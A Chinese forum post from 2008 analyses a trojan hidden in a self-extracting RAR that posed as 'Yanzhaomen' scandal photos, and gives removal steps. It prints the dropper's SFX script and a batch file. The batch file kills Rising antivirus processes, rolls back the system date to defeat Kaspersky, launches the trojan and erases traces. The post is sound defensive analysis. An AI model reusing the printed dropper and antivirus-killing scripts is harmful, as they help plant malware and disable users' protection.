找回密码
 欢迎加入盖氏论坛
搜索
查看: 8033|回复: 0

解密:“燕赵门”背后三大陷阱---病毒+木马!!

[复制链接]
发表于 2008-3-10 19:00:28 | 显示全部楼层 |阅读模式
解密:“燕赵门”背后三大陷阱  测试环境   虚拟机系统:windows xp2   下载软件:迅雷
  杀毒软件:瑞星2008(打了最新补丁包)   一、中招过程
  朋友好奇,寻找燕赵门图片。在百度某贴吧中看到一条信息,提供燕赵下载,并且给出了链接地址“http: //guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载,下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框,由于是测试忽略,点击“继续下载”。(图1)   
     为了测试,笔者的迅雷设置了“下载完成后杀毒”。下载完成后,瑞星病毒扫描后提示“发现2个病毒,清除失败!”(图2)
     
  二、病毒分析   下载完成的这个名称为yanmenzhao,大小为1.04M文件是个压缩文件,后缀为rar。右键单击选择“解压到yanmenzhao下”,解压后为yanmenzhao.exe,其后缀为exe,这是个自动解压文件,估计攻击者一定在其中做了文章。(图3)
     
  这时千万不能直接双击打开,打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件,然后通过“文件”→“打开压缩文件”来打开 yuanmenzhao.exe,果然在其下有两个文件:燕赵门.rar、ymz.exe。第一个文件应该就是图片压缩包,而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码:(图4)   
     Path=%systemroot%
  Setup=ymz.exe   Presetup=燕赵门.rar
  Silent=1   Overwrite=1
  解释如下:   第一行是文件的解压路径,在系统根目录下;
  第二页是解压后自动运行ymz.exe;   第三行是在解压之前先解压燕赵门.rar,达到掩人耳目,看不到ymz.exe文件,其实它已经运行了;
  第四行是隐藏文件,达到更隐蔽;   第五行是覆盖目录下的同名文件,以容错更可靠。
  用同样的方法在WinRAR中解压ymz.exe,发现下面5个文件:(图5)   
     1.bat
  1.exe   1.vbs
  knlps.exe   knlps.sys
  同样在右边有自解压脚本代码:   Path=%systemroot%\temp
  SavePath   Setup=1.vbs
  Silent=1   Overwrite=1
  原理好上面的一样,只不过是解压到系统临时目录下。   用记事本打开1.vbs分析,代码如下:
  CreateObject("WScript.Shell").Run "cmd /c 1.bat",0   很明显,是调用1.bat文件。
  用记事本打开1.bat文件,代码及其解释如下:   @ECHO OFF
  knlps.exe -l >PID.txt   FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt
  FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt   FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt
  FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1   上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。
  set date=%date%   date 1990-01-01
  date 1990-01-01   上述代码是修改系统时间使卡巴监控失效,这句是关键破卡巴查杀的程序流,没这句被杀木马就会被杀。
  @echo off & setlocal enableextensions   echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
  set /a i = 15   :Timeout
  if %i% == 0 goto Next   setlocal
  set /a i = %i% - 1   cscript //nologo %temp%.\tmp$$$.vbs
  goto Timeout   goto End
  上述代码是倒计时等待15秒   :Next
  %systemroot%\temp\1.exe 这个是你木马的名称   for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
  上述代码第二回行就木马名称的解压目录,第三行行是倒计时等待结束后运行木马并删除。   date 2007-10-27 aaa
  date %date% aaa   上述代码是恢复系统时间(卡巴监控)
  RD /S /Q %systemroot%\temp\   上述代码的含义是删除临时文件清除痕迹。
  从上面的分析可以看出该自解压包木马的运行机制是,先通过脚本终结瑞星和卡巴斯基,然后运行真正的木马程序,即1.exe,最后清除痕迹。   三、运行病毒
  1、瑞星被终结   分析完毕,然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况,事先打开了瑞星的“实时监控”和“任务管理器”,以观察病毒运行状态。运行后瑞星没有任何提示,任务栏中的瑞星实时监控图标消失,看来瑞星被终结了。另外,在任务管理中出现了一个cscript.exe进程见图 6,很快地闪动,鼠标无法选择结束,大概几秒钟后该进程消失,在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表,以前的为5个,多了2个)(图6)(图7)
     
     
  2、可疑的网络连接   在命令提示符下敲入命令:
  netstat -ano   查看网络端口连接情况,果然发现了两个可疑IP地址的端口连接:(图8)
     
  TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916   TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424
  这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip   138.com查询,得知是广东省佛山市电信。(图9)
     
  四、清除病毒   1、结束进程
  在结束进程的发现这两个svchost.exe进程之间互相保护,当结束了其中的一个,另一个马上会重新新建一个。因此手工结束速度太慢,通过批处理命令来清除:   把如下代码保存为kill.bat,双击即可。
  @echo off   taskkill /f /pid 1916
  taskkill /f /pid 424   exit
  提示:其中的pid是随机的,一定要找到可疑的svchost.exe进程的pid,如果结束了系统启动的svchost.exe的话,系统就会关机或者重启。确定的方法,可以参考图8。   2、删除服务
  运行services.msc打开“服务”工具,通过分析发现了一个可疑的服务项。   服务名称为:Workstain
  显示名称:qmijiu   描述:Wicrosoft .NET Framework TPM
  可执行文件路径:c:\WINDOWS\system32\svchost.exe -k Workstain   启动类型:自动
  服务状态:已启动   评析:该服务项和Workstation非常相似,并且描述极具欺骗性,攻击者非常狡猾。(图10)
     
  提示:在禁用服务的过程中发现,如果不先结束两个svchost.exe进程,发现根本无法禁用,当你选择禁用该服务,点击确定,它马上改为“自动”运行,可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除,命令为:    sc delete qmijiu
  3、文件删除   (1)C:\WINDOWS目录下的(图11)
     
  燕赵门.rar   ymz.exe
  (1)C:\WINDOWS\system32目录下的(图12)   
     Workstain.drv
  Sharing.dll   总结:该木马病毒利用大众的猎奇心理,把木马和图片打包在一起,然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单,但象朋友这样的人却屡屡中招。这例“燕赵门”木马病毒给我们的启示是:
  1、做好自律,不去猎奇浏览不雅的东西;   2、在系统中要设置显示文件的后缀,这样可以通过文件后缀就可以判断文件的类型。
  3、对自解压文件要非常小心,千万不要直接打开,应该选择用winRAR软件打开,看看有没有可疑的脚本和程序。总之,在思想上和技术上都做好准备,不要成为“燕赵门”木马病毒的下一个受害者。

本版积分规则

QQ|Archiver|手机版|小黑屋|盖氏网站 ( 苏ICP备14043903号 )

GMT+8, 2024-12-22 17:00 , Processed in 0.033292 second(s), 15 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表